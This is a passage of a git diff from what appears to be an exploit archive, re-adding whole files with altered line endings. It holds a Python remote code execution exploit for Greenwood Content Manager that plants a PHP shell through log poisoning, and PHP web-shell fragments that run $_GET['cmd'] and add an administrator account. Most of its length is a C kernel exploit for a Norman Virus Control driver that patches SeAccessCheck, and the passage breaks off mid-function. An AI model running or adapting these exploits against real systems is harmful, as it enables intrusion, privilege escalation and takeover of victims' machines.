+			WordToHexValue_temp = "0" + lByte.toString(16);
+			WordToHexValue = WordToHexValue + WordToHexValue_temp.substr(WordToHexValue_temp.length-2,2);
+		}
+		return WordToHexValue;
+	};
+ 
+	function Utf8Encode(string) {
+		string = string.replace(/\r\n/g,"\n");
+		var utftext = "";
+ 
+		for (var n = 0; n < string.length; n++) {
+ 
+			var c = string.charCodeAt(n);
+ 
+			if (c < 128) {
+				utftext += String.fromCharCode(c);
+			}
+			else if((c > 127) && (c < 2048)) {
+				utftext += String.fromCharCode((c >> 6) | 192);
+				utftext += String.fromCharCode((c & 63) | 128);
+			}
+			else {
+				utftext += String.fromCharCode((c >> 12) | 224);
+				utftext += String.fromCharCode(((c >> 6) & 63) | 128);
+				utftext += String.fromCharCode((c & 63) | 128);
+			}
+ 
+		}
+ 
+		return utftext;
+	};
+ 
+	var x=Array();
+	var k,AA,BB,CC,DD,a,b,c,d;
+	var S11=7, S12=12, S13=17, S14=22;
+	var S21=5, S22=9 , S23=14, S24=20;
+	var S31=4, S32=11, S33=16, S34=23;
+	var S41=6, S42=10, S43=15, S44=21;
+ 
+	string = Utf8Encode(string);
+ 
+	x = ConvertToWordArray(string);
+ 
+	a = 0x67452301; b = 0xEFCDAB89; c = 0x98BADCFE; d = 0x10325476;
+ 
+	for (k=0;k )( Ex. include $_GET[file]; )\n\r"
-shell=raw_input('Code : ')
-user_agent={'User-Agent':'\');fclose($fp); ?>'}
-conn=httplib.HTTPConnection(sys.argv[1],80)
-conn.request("POST",'/' + sys.argv[2] + '/','',user_agent)
-response=conn.getresponse().read()
-urllib.urlopen('http://' + sys.argv[1] + '/' + sys.argv[2] + '/include/processor.php?content_path=../var/access_log')
-print "\n\rShell created : http://" +  sys.argv[1] + sys.argv[2] + "/var/sh.php\n\r"
-
-# milw0rm.com [2009-07-15]
+#!usr/bin/python
+#####################################################################################
+####            Greenwood Content Manager Remote Code Execution                  ####
+#####################################################################################
+#                                                                                   #
+#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
+#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
+#Our Site : http://ircrash.com                                                      #
+#My Official WebSite : http://r3dw0rm.ir                                            #
+#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)            #
+#####################################################################################
+#                                                                                   #
+#Download : http://garr.dl.sourceforge.net/sourceforge/greenwood/greenwood-release-0.3.2.tar.bz2
+#                                                                                   #
+#Dork :  :(                                                                           #
+#                                                                                   #
+#####################################################################################
+#                                      [Bug]                                        #
+#                                                                                   #
+#http://[site]/[path]/include/processor.php?content_path=[evil_code_path]           #
+#                                                                                   #
+###################################### TNX GOD ######################################
+import sys,httplib,urllib
+if len(sys.argv) < 3 :
+    print "\n\rUsage : " + sys.argv[0] + " [site] [path]\n\r"
+    print "Ex : " + sys.argv[0] + " 123.com /greenwood/\n\r"
+    print "Powered by : Sina Yazdanmehr( R3d.W0rm )\n\r"
+    print "http://IrCrash.com - http://R3dW0rm.ir\n\r"
+    exit()
+if 'http://' in sys.argv[1] :
+    sys.argv[1]=sys.argv[1].replace('http://','')
+print "Input evil code.( With out ' and  )( Ex. include $_GET[file]; )\n\r"
+shell=raw_input('Code : ')
+user_agent={'User-Agent':'\');fclose($fp); ?>'}
+conn=httplib.HTTPConnection(sys.argv[1],80)
+conn.request("POST",'/' + sys.argv[2] + '/','',user_agent)
+response=conn.getresponse().read()
+urllib.urlopen('http://' + sys.argv[1] + '/' + sys.argv[2] + '/include/processor.php?content_path=../var/access_log')
+print "\n\rShell created : http://" +  sys.argv[1] + sys.argv[2] + "/var/sh.php\n\r"
+
+# milw0rm.com [2009-07-15]
diff --git a/platforms/php/webapps/9159.php b/platforms/php/webapps/9159.php
index 6f88c6436..1df91b06a 100755
--- a/platforms/php/webapps/9159.php
+++ b/platforms/php/webapps/9159.php
@@ -1,95 +1,95 @@
-          
-
-# milw0rm.com [2009-07-15]
+          
+
+# milw0rm.com [2009-07-15]
diff --git a/platforms/php/webapps/9161.txt b/platforms/php/webapps/9161.txt
index b2bf451d9..300719ce3 100755
--- a/platforms/php/webapps/9161.txt
+++ b/platforms/php/webapps/9161.txt
@@ -1,27 +1,27 @@
-
-
-
-
-
-
    
-
    
-
    Admin News Tools Remote
-Contents Change Vulnerability
    
-
    
-
-  

    
-  
-  
    
-  
    
-  
    
-  
    Just for Fun
-  
    
-  
    
-
-
    
-
-
-
-# milw0rm.com [2009-07-15]
+
+
+
+
+
+
    
+
    
+
    Admin News Tools Remote
+Contents Change Vulnerability
    
+
    
+
    
+  

    
+  ";
-$_GET['cmd']=htmlspecialchars($_GET['cmd']);
-echo "
    CMD: "
-
-?>
-
-# milw0rm.com [2007-08-25]
+";
+$perl->eval("system('".$_GET['cmd']."')");
+echo "</textarea>";
+$_GET['cmd']=htmlspecialchars($_GET['cmd']);
+echo "
    CMD: 
    "
+
+?>
+
+# milw0rm.com [2007-08-25]
diff --git a/platforms/windows/local/4325.php b/platforms/windows/local/4325.php
index d82b378cb..346bfa61a 100755
--- a/platforms/windows/local/4325.php
+++ b/platforms/windows/local/4325.php
@@ -27,7 +27,7 @@ if (isset($_GET['qrF']))
 } elseif(isset($_GET['qQx'])) { exec("net user own own /add & net localgroup Administratoren own /add"); echo "User own -> full privileges successfully addet";exit;}
 echo "";
+echo "</textarea>";
 while (false !== ($qQr = readdir($qQd))){
 
 switch(filetype($qQa.$qQr))
diff --git a/platforms/windows/local/4345.c b/platforms/windows/local/4345.c
index d1061b043..dff9ffd64 100755
--- a/platforms/windows/local/4345.c
+++ b/platforms/windows/local/4345.c
@@ -1,553 +1,553 @@
-/*
-  Norman Virus Control nvcoaft51.sys ioctl BF672028 exploit
-
-
-  Abstract
-  nvcoaft51.sys driver receive as parameter in some ioctl's
-  a pointer to a KEVENT struct, calling KeSetEvent without
-  any prior check. 
-  The device created by the driver (NvcOa) can be opened by 
-  any user.
-  As result, a user can send a IOCTL with a fake KEVENT 
-  struct and finish executing code at ring0
-
-  Author
-  inocraM - inocram[at]48bits[dot]com
-  48bits I+D team
-  www.48bits.com
-
-  OS
-  Tested against Windows XP SP2 (spanish) with a PAE kernel.
-  
-  For educational purposes ONLY
-
-*/
-
-#define _CRT_SECURE_NO_DEPRECATE
-#include 
-#include 
-
-#define XPLT_KEVENT_IOCTL             0xbf672028 
-
-
-/* PSAPI */
-typedef BOOL  (WINAPI * ENUM_DEVICE_DRIVERS)(LPVOID* lpImageBase,DWORD cb,LPDWORD lpcbNeeded);
-typedef DWORD (WINAPI * GET_DEVICE_DRIVER_BASE_NAME)(LPVOID ImageBase,LPSTR lpBaseName,DWORD nSize);
-
-typedef struct _PS
-{
-  HMODULE hLib;
-  ENUM_DEVICE_DRIVERS pEnumDeviceDrivers;
-  GET_DEVICE_DRIVER_BASE_NAME pGetDeviceDriverBaseName;
-}PS, *PPS;
-
-
-VOID
-psUnload(PPS pps)
-{
-  if(pps)
-  {
-    if(pps->hLib)
-    {
-      FreeLibrary(pps->hLib);
-    }
-    free(pps);
-  }
-}
-
-PPS
-psLoad()
-{
-  PPS pps;
-
-  pps = (PPS) malloc(sizeof(PS));
-  if(pps)
-  {
-    pps->hLib = LoadLibraryA("psapi");
-    if(pps->hLib)
-    {
-      pps->pEnumDeviceDrivers = (ENUM_DEVICE_DRIVERS)GetProcAddress(pps->hLib, "EnumDeviceDrivers");
-      pps->pGetDeviceDriverBaseName = (GET_DEVICE_DRIVER_BASE_NAME)GetProcAddress(pps->hLib,"GetDeviceDriverBaseNameA");
-      if(!pps->pEnumDeviceDrivers || !pps->pGetDeviceDriverBaseName)
-      {
-        psUnload(pps);
-        pps = NULL;
-      }
-    }
-    else
-    {
-      free(pps);
-      pps = NULL;
-    }
-  }
-  return pps;
-}
-
-
-BOOL  
-psEnumDeviceDrivers(PPS pps, LPVOID* lpImageBase,DWORD cb,LPDWORD lpcbNeeded)
-{
-  return pps->pEnumDeviceDrivers(lpImageBase, cb, lpcbNeeded);
-}
-
-DWORD 
-psGetDeviceDriverBaseName(PPS pps, LPVOID ImageBase,LPSTR lpBaseName,DWORD nSize)
-{
-  return pps->pGetDeviceDriverBaseName(ImageBase, lpBaseName, nSize);
-}
-
-LPVOID
-psGetImageBaseByBaseName(PPS pps, LPCSTR szName)
-{
-  DWORD dwSize = 0;
-  LPVOID *pDevices = NULL;
-  LPVOID pResult = NULL;
-
-  if(psEnumDeviceDrivers(pps, NULL, 0, &dwSize) && (dwSize > 0))
-  {
-    pDevices = (LPVOID*)malloc(dwSize);
-    if(pDevices)
-    {
-      if(psEnumDeviceDrivers(pps, pDevices, dwSize, &dwSize))
-      {
-        DWORD i = 0;
-        DWORD dwNumberOfDrivers;
-
-        dwNumberOfDrivers = dwSize / sizeof(LPVOID);
-        while((i < dwNumberOfDrivers) && (NULL == pResult))
-        {
-          char szBaseName[MAX_PATH];
-
-          if(psGetDeviceDriverBaseName(pps, pDevices[i], szBaseName, sizeof(szBaseName)))
-          {
-            if(!_stricmp(szBaseName,szName))
-            {
-              pResult = pDevices[i];
-            }
-          }
-          i++;
-        }
-      }
-      free(pDevices);
-    }
-  }
-  return pResult;
-}
-
-/* OS detection */
-#define OS_VERSION_UNKNOWN      0x00000000
-#define OS_VERSION_NT           0x00010000
-#define OS_VERSION_9X           0x00020000
-#define OS_VERSION_WIN32S       0x00030000
-#define OS_VERSION_NT4          OS_VERSION_NT + 0x00001000
-#define OS_VERSION_2K           OS_VERSION_NT + 0x00002000
-#define OS_VERSION_XP           OS_VERSION_NT + 0x00003000
-#define OS_VERSION_2K3          OS_VERSION_NT + 0x00004000
-#define OS_VERSION_VISTA        OS_VERSION_NT + 0x00005000
-#define OS_VERSION_95           OS_VERSION_9X + 0x00001000
-#define OS_VERSION_98           OS_VERSION_9X + 0x00002000
-#define OS_VERSION_ME           OS_VERSION_9X + 0x00003000
-
-
-DWORD
-GetWindows9xVersion(POSVERSIONINFOEXA posvi)
-{
-  DWORD dwVersion;
-
-  if(posvi->dwMajorVersion == 4)
-  {
-    switch(posvi->dwMinorVersion)
-    {
-    case 0:
-      dwVersion = OS_VERSION_95;
-      break;
-    case 10:
-      // TODO : we need extra code. this can be Windows ME
-      dwVersion = OS_VERSION_98;
-      break;
-    case 90:
-      dwVersion = OS_VERSION_ME;
-      break;
-    default:
-      dwVersion = OS_VERSION_UNKNOWN;
-    }
-  }
-  else
-  {
-    dwVersion = OS_VERSION_UNKNOWN;
-  }
-  return dwVersion;
-}
-
-
-DWORD
-GetWindowsNtVersion(POSVERSIONINFOEXA posvi, PUINT pServicePack)
-{
-  DWORD dwVersion;
-
-  switch(posvi->dwMajorVersion)
-  {
-  case 6: 
-    dwVersion = OS_VERSION_VISTA;
-    break;
-  case 5:
-    switch(posvi->dwMinorVersion)
-    {
-    case 2:
-      dwVersion = OS_VERSION_2K3;
-      break;
-    case 1:
-      dwVersion = OS_VERSION_XP;
-      break;
-    case 0:
-      dwVersion = OS_VERSION_2K;
-      break;
-    default:
-      dwVersion = OS_VERSION_UNKNOWN;
-    }
-    break;
-  case 4:
-  case 3:
-  case 2:
-  case 1:
-  case 0:
-    dwVersion = OS_VERSION_NT4;
-    break;
-  default:
-    dwVersion = OS_VERSION_UNKNOWN;
-  }
-
-  // TODO : dont work correctly in various windows Versions. fix it.
-  if((OS_VERSION_UNKNOWN != dwVersion) && (NULL != pServicePack))
-  {
-    if(sizeof(OSVERSIONINFOEXA) == posvi->dwOSVersionInfoSize)
-    {
-      (*pServicePack) = posvi->wServicePackMajor;
-    }
-    else
-    {
-      // TODO : parse szCSDVersion
-    }
-  }
-  return dwVersion;
-}
-
-// TODO : doesnt find correct SP for various windows versions, fix! 
-DWORD
-GetWindowsVersionBase(PUINT pServicePack)
-{
-  OSVERSIONINFOEXA osvi;
-  DWORD dwVersion;
-
-  if(pServicePack)
-  {
-    (*pServicePack) = 0;
-  }
-  memset(&osvi, 0, sizeof(OSVERSIONINFOEXA));
-  osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEXA);
-  if(FALSE == GetVersionExA((LPOSVERSIONINFOA)&osvi))
-  {
-    osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOA);
-    if(!GetVersionExA((LPOSVERSIONINFOA)&osvi))
-    {
-      return OS_VERSION_UNKNOWN;
-    }
-  }
-  switch(osvi.dwPlatformId)
-  {
-  case VER_PLATFORM_WIN32_NT:
-    dwVersion = GetWindowsNtVersion(&osvi, pServicePack);
-    break;
-  case VER_PLATFORM_WIN32_WINDOWS:
-    dwVersion = GetWindows9xVersion(&osvi);
-    break;
-  case VER_PLATFORM_WIN32s:
-    dwVersion = OS_VERSION_WIN32S;
-    break;
-  default:
-    dwVersion = OS_VERSION_UNKNOWN;
-  }
-  return dwVersion;
-}
-
-DWORD
-GetWindowsVersion(PUINT pServicePack)
-{
-  static BOOL bFirstCall = TRUE;
-  static DWORD OsVersion;
-  static UINT ServicePack;
-
-  if(bFirstCall)
-  {
-    OsVersion = GetWindowsVersionBase(&ServicePack);
-    bFirstCall = FALSE;
-  }
-  if(pServicePack)
-  {
-    (*pServicePack) = ServicePack;
-  }
-  return OsVersion;
-}
-
-
-
-HANDLE
-OpenDevice(LPCSTR szDevice, DWORD dwDesiredAccess, DWORD dwShareMode)
-{
-  return CreateFileA(szDevice,dwDesiredAccess,dwShareMode,NULL,OPEN_EXISTING,0,NULL);
-}
-
-VOID
-CloseDevice(HANDLE hDevice)
-{
-  CloseHandle(hDevice);
-}
-
-
-BOOL
-xpltCheckWindowsVersion()
-{
-  DWORD dwOsVersion;
-  BOOL bResult = FALSE;
-  UINT ServicePack;
-
-  printf("(*)Checking OS Version...\n");
-  dwOsVersion = GetWindowsVersion(&ServicePack);
-  if((OS_VERSION_XP == dwOsVersion) && (ServicePack == 2))
-  {
-    printf("(+)Detected Windows XP SP2.\n");
-    bResult = TRUE;
-  }
-  else
-  {
-    printf("(-)This exploit only runs on Windows XP SP2. Sorry.\n");
-  }
-  return bResult;
-}
-
-HANDLE
-xpltOpenNvc0a()
-{
-  HANDLE hDevice;
-
-  printf("(*)Opening NvcOa device...\n");
-  hDevice = OpenDevice("\\\\.\\NvcOa", GENERIC_READ + GENERIC_WRITE, 0);
-  if(INVALID_HANDLE_VALUE != hDevice)
-  {
-    printf("(+)Successfully opened NvcOa.\n");
-  }
-  else
-  {
-    printf("(-)Unable to open NvcOa. Sorry.\n");
-  }
-  return hDevice;
-}
-
-VOID
-xpltCloseNvc0a(HANDLE hDevice)
-{
-  CloseDevice(hDevice);
-  printf("(+)NvcOa device closed.\n");
-}
-
-PPS
-xpltInitializePsApi()
-{
-  PPS pps;
-  printf("(*)Loading PSAPI...\n");
-  pps = psLoad();
-  if(NULL != pps)
-  {
-    printf("(+)PSAPI loaded OK.\n");
-  }
-  else
-  {
-    printf("(-)Unable to load PSAPI. Sorry.\n");
-  }
-  return pps;
-}
-
-VOID
-xpltFreePsApi(PPS pps)
-{
-  psUnload(pps);
-  printf("(+)PSAPI Unloaded.\n");
-}
-
-
-LPBYTE
-xpltGetKernelBase(PPS pps, PBOOL pbPaeKernel)
-{
-  LPBYTE pKernelBase;
-
-  printf("(*)Looking for NTOSKRNL base...\n");
-  (*pbPaeKernel) = FALSE;
-  pKernelBase = (LPBYTE) psGetImageBaseByBaseName(pps, "NTOSKRNL.EXE");
-  if(pKernelBase)
-  {
-    printf("(+)NTOSKRNL base found at %#x.\n",pKernelBase);
-  }
-  else
-  {
-    pKernelBase = (LPBYTE) psGetImageBaseByBaseName(pps, "NTKRNLPA.EXE");
-    if(pKernelBase)
-    {
-      printf("(+)NTOSKRNL(PAE) base found at %#x.\n",pKernelBase);
-      if(pbPaeKernel)
-      {
-        (*pbPaeKernel) = TRUE;
-      }
-    }
-    else
-    {
-      printf("(-)Unable to find NTOSKRNL base. Sorry.\n");
-    }
-  }
-  return pKernelBase;
-}
-
-
-/* 
-   when the ioctl with a fake event structure is sent
-   a dword with the opcode "jmp[ecx]" is written and
-   this code is reached.
-   Be careful writing your own shellcode. Remember that
-   u are at DPC level
-*/
-__declspec(naked)
-void 
-xpltPatchAndGo (void)
-{
-  __asm
-  {
-    add esp,4
-    pop esi                                   /* get a return addr to use as reference */ 
-    mov dword ptr[esi-0x60], 0x8B047289       /* patch the jmp[ecx] with the correct code */
-    mov word ptr[esi+0xE5303], 0x9090         /* patch SeAccessCheck :o) */
-    mov esp, ebp                              /* reconstruct the stack */
-    add esp, 0x10       
-    xor bl, bl                                /* set IRQL value */
-    xor edi, edi                              /* set return value */                       
-    sub esi, 0x759F                            
-    push esi                                  /* set retun address... */
-    ret                                       /* and go */
-  }
-
-}
-
-VOID
-xpltExecuteExploit(HANDLE hDevice, PBYTE pNtosBase, BOOL bPaeKernel)
-{
-
-#ifdef _DEBUG
-  DebugBreak();
-#endif
-
-  if(!bPaeKernel)
-  {
-    printf("(-)This exploit is only runs on a PAE kernel system. Sorry.\n");
-  }
-  else
-  {
-    DWORD dwReturnedBytes;
-    DWORD Buffer[1024];                             /* user buffer size is not checked         */
-                                                    /* properly so i use a big enough  buffer  */
-                                                    /* and i  dont worry abaut it              */
-
-    DWORD Event[31];                                /* our event struct                        */
-
-    printf("(*)Trying to exploit the NvCoaft51 KeSetEvent vuln...\n");
-    printf("(*)Writing fake event struct...\n");
-
-    *(BYTE*)Event = 1;                              /* set event type as Synchronization Event */
-
-    Event[2] = (DWORD)&(Event[3]);                  /* set event wait list as not empty so in  */
-                                                    /* event[3] start the first  wait block    */
-
-    Event[3] = (DWORD)&(Event[4]);                  /* set first element of the wait list      */
-                                                    /* event[4]  will be our wait block        */
-
-    ((WORD*)Event)[17] = 1;                         /* set the wait block type to WaitAny      */
-
-    Event[5] = (DWORD)&(Event[7]);                  /* set the trhead for the wait block, so   */
-                                                    /* event[7] will be our thread start       */
-
-    Event[7] = (DWORD)xpltPatchAndGo;               /* i put the shellcode addr on the first   */
-                                                    /* dword of the thread. This value is not  */
-                                                    /* checked by KeSetEvent related code, and */
-                                                    /* the event struct will remain referenced */
-                                                    /* by ecx,so writing a jmp[ecx] the        */
-                                                    /* shellocde will be reached               */
-
-
-    Event[30] = (DWORD)&(Event[10]);                /* fill thread wait block list with data   */
-                                                    /* so in event[10] start this wait block.  */
-                                                    /* First two dwords of the kwait block     */
-                                                    /* struct are a list entry. system will    */
-                                                    /* try to remove a item from this double   */
-                                                    /* linked list, and as consecuence, we     */
-                                                    /* can write an arbitrary dword at any     */
-                                                    /* address                                 */
-
-
-    Event[10] = 0x000021FF;                         /* first entry will be a opcode, jmp[ecx]  */
-
-    Event[11] = (DWORD)(pNtosBase + 0x291B4);       /* second entry will be the address of th  */
-                                                    /* next opcode addr, and as result we will */
-                                                    /* jmp to our shellcode                    */
-
-
-    Buffer[0] = (DWORD)(((PBYTE)(&Event)) - 0x84C); /* store our "event" in the ioctl buffer   */
-                                                    /* and explit it :o)                       */
-
-    printf("(*)Sending IOCTL...\n");
-    DeviceIoControl(hDevice,XPLT_KEVENT_IOCTL,Buffer,sizeof(Buffer),Buffer,sizeof(Buffer),&dwReturnedBytes,NULL);
-    printf("(+)IOCT sent. SeAccessCheck is now patched???\n");
-  }
-}
-
-
-VOID
-xpltExecute()
-{
-  if(xpltCheckWindowsVersion())
-  {
-    PPS pps;
-
-    pps = xpltInitializePsApi();
-    if(NULL != pps)
-    {
-      LPBYTE pKernelBase;
-      BOOL bPaeKernel;
-
-      pKernelBase = xpltGetKernelBase(pps,&bPaeKernel);
-      if(NULL != pKernelBase)
-      {
-        HANDLE hDevice;
-
-        hDevice = xpltOpenNvc0a();
-        if(INVALID_HANDLE_VALUE != hDevice)
-        {
-          xpltExecuteExploit(hDevice, pKernelBase, bPaeKernel);
-          xpltCloseNvc0a(hDevice);
-        }
-      }
-      xpltFreePsApi(pps);
-    }
-  }
-}
-
-int main(int argc, char * argv[])
-{
-  UNREFERENCED_PARAMETER(argc);
-  UNREFERENCED_PARAMETER(argv);
-
-#ifdef _DEBUG
-  DebugBreak();
-#endif
-
-  xpltExecute();
-  return 0;
-}
-
-// milw0rm.com [2007-08-30]
+/*
+  Norman Virus Control nvcoaft51.sys ioctl BF672028 exploit
+
+
+  Abstract
+  nvcoaft51.sys driver receive as parameter in some ioctl's
+  a pointer to a KEVENT struct, calling KeSetEvent without
+  any prior check. 
+  The device created by the driver (NvcOa) can be opened by 
+  any user.
+  As result, a user can send a IOCTL with a fake KEVENT 
+  struct and finish executing code at ring0
+
+  Author
+  inocraM - inocram[at]48bits[dot]com
+  48bits I+D team
+  www.48bits.com
+
+  OS
+  Tested against Windows XP SP2 (spanish) with a PAE kernel.
+  
+  For educational purposes ONLY
+
+*/
+
+#define _CRT_SECURE_NO_DEPRECATE
+#include 
+#include 
+
+#define XPLT_KEVENT_IOCTL             0xbf672028 
+
+
+/* PSAPI */
+typedef BOOL  (WINAPI * ENUM_DEVICE_DRIVERS)(LPVOID* lpImageBase,DWORD cb,LPDWORD lpcbNeeded);
+typedef DWORD (WINAPI * GET_DEVICE_DRIVER_BASE_NAME)(LPVOID ImageBase,LPSTR lpBaseName,DWORD nSize);
+
+typedef struct _PS
+{
+  HMODULE hLib;
+  ENUM_DEVICE_DRIVERS pEnumDeviceDrivers;
+  GET_DEVICE_DRIVER_BASE_NAME pGetDeviceDriverBaseName;
+}PS, *PPS;
+
+
+VOID
+psUnload(PPS pps)
+{
+  if(pps)
+  {
+    if(pps->hLib)
+    {
+      FreeLibrary(pps->hLib);
+    }
+    free(pps);
+  }
+}
+
+PPS
+psLoad()
+{
+  PPS pps;
+
+  pps = (PPS) malloc(sizeof(PS));
+  if(pps)
+  {
+    pps->hLib = LoadLibraryA("psapi");
+    if(pps->hLib)
+    {
+      pps->pEnumDeviceDrivers = (ENUM_DEVICE_DRIVERS)GetProcAddress(pps->hLib, "EnumDeviceDrivers");
+      pps->pGetDeviceDriverBaseName = (GET_DEVICE_DRIVER_BASE_NAME)GetProcAddress(pps->hLib,"GetDeviceDriverBaseNameA");
+      if(!pps->pEnumDeviceDrivers || !pps->pGetDeviceDriverBaseName)
+      {
+        psUnload(pps);
+        pps = NULL;
+      }
+    }
+    else
+    {
+      free(pps);
+      pps = NULL;
+    }
+  }
+  return pps;
+}
+
+
+BOOL  
+psEnumDeviceDrivers(PPS pps, LPVOID* lpImageBase,DWORD cb,LPDWORD lpcbNeeded)
+{
+  return pps->pEnumDeviceDrivers(lpImageBase, cb, lpcbNeeded);
+}
+
+DWORD 
+psGetDeviceDriverBaseName(PPS pps, LPVOID ImageBase,LPSTR lpBaseName,DWORD nSize)
+{
+  return pps->pGetDeviceDriverBaseName(ImageBase, lpBaseName, nSize);
+}
+
+LPVOID
+psGetImageBaseByBaseName(PPS pps, LPCSTR szName)
+{
+  DWORD dwSize = 0;
+  LPVOID *pDevices = NULL;
+  LPVOID pResult = NULL;
+
+  if(psEnumDeviceDrivers(pps, NULL, 0, &dwSize) && (dwSize > 0))
+  {
+    pDevices = (LPVOID*)malloc(dwSize);
+    if(pDevices)
+    {
+      if(psEnumDeviceDrivers(pps, pDevices, dwSize, &dwSize))
+      {
+        DWORD i = 0;
+        DWORD dwNumberOfDrivers;
+
+        dwNumberOfDrivers = dwSize / sizeof(LPVOID);
+        while((i < dwNumberOfDrivers) && (NULL == pResult))
+        {
+          char szBaseName[MAX_PATH];
+
+          if(psGetDeviceDriverBaseName(pps, pDevices[i], szBaseName, sizeof(szBaseName)))
+          {
+            if(!_stricmp(szBaseName,szName))
+            {
+              pResult = pDevices[i];
+            }
+          }
+          i++;
+        }
+      }
+      free(pDevices);
+    }
+  }
+  return pResult;
+}
+
+/* OS detection */
+#define OS_VERSION_UNKNOWN      0x00000000
+#define OS_VERSION_NT           0x00010000
+#define OS_VERSION_9X           0x00020000
+#define OS_VERSION_WIN32S       0x00030000
+#define OS_VERSION_NT4          OS_VERSION_NT + 0x00001000
+#define OS_VERSION_2K           OS_VERSION_NT + 0x00002000
+#define OS_VERSION_XP           OS_VERSION_NT + 0x00003000
+#define OS_VERSION_2K3          OS_VERSION_NT + 0x00004000
+#define OS_VERSION_VISTA        OS_VERSION_NT + 0x00005000
+#define OS_VERSION_95           OS_VERSION_9X + 0x00001000
+#define OS_VERSION_98           OS_VERSION_9X + 0x00002000
+#define OS_VERSION_ME           OS_VERSION_9X + 0x00003000
+
+
+DWORD
+GetWindows9xVersion(POSVERSIONINFOEXA posvi)
+{
+  DWORD dwVersion;
+
+  if(posvi->dwMajorVersion == 4)
+  {
+    switch(posvi->dwMinorVersion)
+    {
+    case 0:
+      dwVersion = OS_VERSION_95;
+      break;
+    case 10:
+      // TODO : we need extra code. this can be Windows ME
+      dwVersion = OS_VERSION_98;
+      break;
+    case 90:
+      dwVersion = OS_VERSION_ME;
+      break;
+    default:
+      dwVersion = OS_VERSION_UNKNOWN;
+    }
+  }
+  else
+  {
+    dwVersion = OS_VERSION_UNKNOWN;
+  }
+  return dwVersion;
+}
+
+
+DWORD
+GetWindowsNtVersion(POSVERSIONINFOEXA posvi, PUINT pServicePack)
+{
+  DWORD dwVersion;
+
+  switch(posvi->dwMajorVersion)
+  {
+  case 6: 
+    dwVersion = OS_VERSION_VISTA;
+    break;
+  case 5:
+    switch(posvi->dwMinorVersion)
+    {
+    case 2:
+      dwVersion = OS_VERSION_2K3;
+      break;
+    case 1:
+      dwVersion = OS_VERSION_XP;
+      break;
+    case 0:
+      dwVersion = OS_VERSION_2K;
+      break;
+    default:
+      dwVersion = OS_VERSION_UNKNOWN;
+    }
+    break;
+  case 4:
+  case 3:
+  case 2:
+  case 1:
+  case 0:
+    dwVersion = OS_VERSION_NT4;
+    break;
+  default:
+    dwVersion = OS_VERSION_UNKNOWN;
+  }
+
+  // TODO : dont work correctly in various windows Versions. fix it.
+  if((OS_VERSION_UNKNOWN != dwVersion) && (NULL != pServicePack))
+  {
+    if(sizeof(OSVERSIONINFOEXA) == posvi->dwOSVersionInfoSize)
+    {
+      (*pServicePack) = posvi->wServicePackMajor;
+    }
+    else
+    {
+      // TODO : parse szCSDVersion
+    }
+  }
+  return dwVersion;
+}
+
+// TODO : doesnt find correct SP for various windows versions, fix! 
+DWORD
+GetWindowsVersionBase(PUINT pServicePack)
+{
+  OSVERSIONINFOEXA osvi;
+  DWORD dwVersion;
+
+  if(pServicePack)
+  {
+    (*pServicePack) = 0;
+  }
+  memset(&osvi, 0, sizeof(OSVERSIONINFOEXA));
+  osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEXA);
+  if(FALSE == GetVersionExA((LPOSVERSIONINFOA)&osvi))
+  {
+    osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOA);
+    if(!GetVersionExA((LPOSVERSIONINFOA)&osvi))
+    {
+      return OS_VERSION_UNKNOWN;
+    }
+  }
+  switch(osvi.dwPlatformId)
+  {
+  case VER_PLATFORM_WIN32_NT:
+    dwVersion = GetWindowsNtVersion(&osvi, pServicePack);
+    break;
+  case VER_PLATFORM_WIN32_WINDOWS:
+    dwVersion = GetWindows9xVersion(&osvi);
+    break;
+  case VER_PLATFORM_WIN32s:
+    dwVersion = OS_VERSION_WIN32S;
+    break;
+  default:
+    dwVersion = OS_VERSION_UNKNOWN;
+  }
+  return dwVersion;
+}
+
+DWORD
+GetWindowsVersion(PUINT pServicePack)
+{
+  static BOOL bFirstCall = TRUE;
+  static DWORD OsVersion;
+  static UINT ServicePack;
+
+  if(bFirstCall)
+  {
+    OsVersion = GetWindowsVersionBase(&ServicePack);
+    bFirstCall = FALSE;
+  }
+  if(pServicePack)
+  {
+    (*pServicePack) = ServicePack;
+  }
+  return OsVersion;
+}
+
+
+
+HANDLE
+OpenDevice(LPCSTR szDevice, DWORD dwDesiredAccess, DWORD dwShareMode)
+{
+  return CreateFileA(szDevice,dwDesiredAccess,dwShareMode,NULL,OPEN_EXISTING,0,NULL);
+}
+
+VOID
+CloseDevice(HANDLE hDevice)
+{
+  CloseHandle(hDevice);
+}
+
+
+BOOL
+xpltCheckWindowsVersion()
+{
+  DWORD dwOsVersion;
+  BOOL bResult = FALSE;
+  UINT ServicePack;
+
+  printf("(*)Checking OS Version...\n");
+  dwOsVersion = GetWindowsVersion(&ServicePack);
+  if((OS_VERSION_XP == dwOsVersion) && (ServicePack == 2))
+  {
+    printf("(+)Detected Windows XP SP2.\n");
+    bResult = TRUE;
+  }
+  else
+  {
+    printf("(-)This exploit only runs on Windows XP SP2. Sorry.\n");
+  }
+  return bResult;
+}
+
+HANDLE
+xpltOpenNvc0a()
+{
+  HANDLE hDevice;
+
+  printf("(*)Opening NvcOa device...\n");
+  hDevice = OpenDevice("\\\\.\\NvcOa", GENERIC_READ + GENERIC_WRITE, 0);
+  if(INVALID_HANDLE_VALUE != hDevice)
+  {
+    printf("(+)Successfully opened NvcOa.\n");
+  }
+  else
+  {
+    printf("(-)Unable to open NvcOa. Sorry.\n");
+  }
+  return hDevice;
+}
+
+VOID
+xpltCloseNvc0a(HANDLE hDevice)
+{
+  CloseDevice(hDevice);
+  printf("(+)NvcOa device closed.\n");
+}
+
+PPS
+xpltInitializePsApi()
+{
+  PPS pps;
+  printf("(*)Loading PSAPI...\n");
+  pps = psLoad();
+  if(NULL != pps)
+  {
+    printf("(+)PSAPI loaded OK.\n");
+  }
+  else
+  {
+    printf("(-)Unable to load PSAPI. Sorry.\n");
+  }
+  return pps;
+}
+
+VOID
+xpltFreePsApi(PPS pps)
+{
+  psUnload(pps);
+  printf("(+)PSAPI Unloaded.\n");
+}
+
+
+LPBYTE
+xpltGetKernelBase(PPS pps, PBOOL pbPaeKernel)
+{
+  LPBYTE pKernelBase;
+
+  printf("(*)Looking for NTOSKRNL base...\n");
